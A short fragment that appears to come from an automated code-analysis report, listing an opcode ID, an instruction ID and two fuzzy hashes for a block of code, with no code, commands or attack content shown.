    • Opcode ID: 5dd7998d9f00c0f7fd5a7dcc71336826af2e178b8040c12a793cad92f1755f65
    • Instruction ID: d00034443094647557f60db136cdc5feec0ce07946002ad2c8e3068fc16bae19
    • Opcode Fuzzy Hash: 5dd7998d9f00c0f7fd5a7dcc71336826af2e178b8040c12a793cad92f1755f65
    • Instruction Fuzzy Hash: A3E01251A0CD4A89F5109B06FC101792255FF617A8F5002B5E96E669B19D2CD5C69308